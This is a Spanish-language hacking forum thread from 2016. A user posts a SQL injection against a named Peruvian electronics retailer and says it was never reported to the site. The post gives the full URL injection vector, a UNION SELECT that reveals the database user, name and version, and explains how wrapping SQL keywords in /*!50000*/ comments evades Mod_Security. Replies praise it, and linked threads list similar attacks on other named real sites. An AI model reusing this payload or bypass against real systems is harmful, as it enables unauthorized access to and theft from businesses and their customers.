send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[SQLi] https://impulso.com.pe

  • 2 Respuestas
  • 1120 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado rreedd

  • *
  • Underc0der
  • Mensajes: 113
  • Actividad:
    0%
  • Reputación 6
  • Somos Nada Señores
    • Ver Perfil
« en: Marzo 11, 2016, 08:30:58 pm »
Sitio : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Descripción Del Sitio : Venta de artículos electrónicos en Perú.

Descripción de la inyección : Bueno esta inyección necesito un poco mas de creatividad que lo normal ya que se necesito pasar por sobre Mod_Security, el cual intentaba atraparme en mi intento de inyección, pero con tiempo y paciencia al fin lo logre bypassear al agregar !50000 antes de los comandos SQL que filtraba ;D.
  • [SQLi] Inyección en URL (el resultado se la inyección se ve reflejado en la imagen, así que si miramos el código fuente veremos la inyección ).
       

        Url del sitio : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

       Vector : -1%27/*!50000UNION*//*!50000SELECT*/1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5%20--+&cat_id=50

        xploit : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
     
        Reportado: NO

        Autor: RREEDD

Cualquier duda o sugerencia por favor no dudes en comentar.
Saludos desde Chile
« Última modificación: Marzo 12, 2016, 01:26:09 pm por rreedd »

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1881
  • Actividad:
    23.33%
  • Reputación 14
    • Ver Perfil
« Respuesta #1 en: Marzo 12, 2016, 07:31:01 am »
Muy bueno @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login la imagen está caida, puedes resubirla?

Gracias,

Un saludo!



Desconectado rreedd

  • *
  • Underc0der
  • Mensajes: 113
  • Actividad:
    0%
  • Reputación 6
  • Somos Nada Señores
    • Ver Perfil
« Respuesta #2 en: Marzo 12, 2016, 01:43:27 pm »

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Muy bueno @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login la imagen está caida, puedes resubirla?

Gracias,

Un saludo!
Hola compañero @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login  imagen resubida  :)

Saludos desde Chile

 

¿Te gustó el post? COMPARTILO!



[SQLi] leong-leong.com

Iniciado por F0M3T

Respuestas: 0
Vistas: 722
Último mensaje Abril 10, 2013, 02:39:57 am
por F0M3T
Agujero en servidores de BBDD [Hacking Google + SQLi] - www.kanglin.com.tw

Iniciado por baah

Respuestas: 5
Vistas: 1686
Último mensaje Junio 02, 2017, 06:39:33 am
por baah
SQLI Double Error Based http://campusvirtual.frsf.utn.edu.ar

Iniciado por hdbreaker

Respuestas: 1
Vistas: 978
Último mensaje Febrero 19, 2013, 06:59:26 pm
por ANTRAX
SQLI Bypass Admin.asp SocArgentina Investigacion Bioquimica e Ing Molecular

Iniciado por hdbreaker

Respuestas: 1
Vistas: 1115
Último mensaje Marzo 12, 2013, 12:46:44 pm
por Cronos
SQLI Organo Profesional de los Ingenieros de Caminos Canales y Puertos

Iniciado por hdbreaker

Respuestas: 1
Vistas: 1008
Último mensaje Julio 25, 2013, 10:14:56 pm
por F0M3T